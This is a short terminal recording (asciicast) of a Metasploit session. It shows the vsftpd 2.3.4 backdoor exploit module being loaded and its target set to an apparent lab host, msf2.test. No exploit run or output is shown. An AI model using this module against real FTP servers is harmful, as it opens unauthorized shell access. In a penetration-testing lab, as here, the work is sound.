{"version": 2, "width": 121, "height": 31, "timestamp": 1727622732, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[714.181179, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/ftp/vsftpd_234_backdoor\u001b[0m) \u001b[0m> "]
[714.301915, "o", "s"]
[714.467519, "o", "e"]
[714.506905, "o", "t"]
[714.65312, "o", " "]
[714.951851, "o", "r"]
[715.363272, "o", "h"]
[715.587233, "o", "o"]
[715.652866, "o", "s"]
[715.703483, "o", "t"]
[716.058127, "o", " "]
[716.228336, "o", "m"]
[716.41557, "o", "s"]
[716.63624, "o", "f"]
[716.846079, "o", "t"]
[717.113141, "o", "2"]
[717.511348, "o", "\b\u001b[K"]
[717.640599, "o", "\b\u001b[K"]
[717.728397, "o", "2"]
[717.890525, "o", "."]
[717.96937, "o", "t"]
[718.12471, "o", "e"]
[718.237421, "o", "s"]
[718.402652, "o", "t"]
[720.235962, "o", "\r\r\n"]
[720.259432, "o", "\u001b[0m"]
[720.279253, "o", "rhost => msf2.test\r\n"]
